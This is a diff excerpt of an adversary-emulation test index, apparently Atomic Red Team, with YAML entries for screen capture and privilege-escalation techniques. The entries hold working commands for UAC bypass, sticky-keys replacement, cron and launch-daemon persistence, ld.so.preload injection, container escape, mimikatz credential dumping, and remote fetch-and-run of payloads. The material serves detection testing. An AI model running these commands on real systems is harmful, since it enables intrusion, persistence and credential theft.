'screencapture #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud -' + ' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot -' + ' supported_platforms: - linux input_arguments: @@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed -' + ' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat -' + ' executor: command: 'import -window root #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour -' + ' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore -' + ' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview @@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete 